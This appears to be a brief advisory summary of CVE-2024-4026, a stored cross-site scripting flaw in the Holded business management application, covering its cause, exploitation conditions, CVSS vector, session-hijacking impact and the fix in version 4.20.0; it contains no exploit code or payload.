CVE-2024-4026

Vulnerability

The CVE-2024-4026 vulnerability is a stored Cross-Site Scripting (XSS) issue in the Holded application, a management software for SMEs. The flaw exists because all editable parameters within the 'General' and 'Team ID' functionalities are not properly sanitized, allowing an attacker to store a malicious JavaScript payload [1].

Exploitation

An attacker with low privileges can inject the payload into any editable field in the mentioned functionalities. When a victim (with at least low privileges and requiring user interaction) accesses the affected page, the stored script executes in the context of the victim's browser [1]. The CVSS v3.1 vector indicates a network attack vector with low attack complexity and low privileges required, but user interaction is necessary (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N).

Impact

Successful exploitation could lead to session hijacking, allowing the attacker to take over the victim's session. This compromises confidentiality and integrity of user data, though the impact is limited to low-level effects as per the CVSS score [1].

Mitigation

The vulnerability has been fixed in Holded version 4.20.0. Users are advised to update to the latest version to mitigate the risk [1].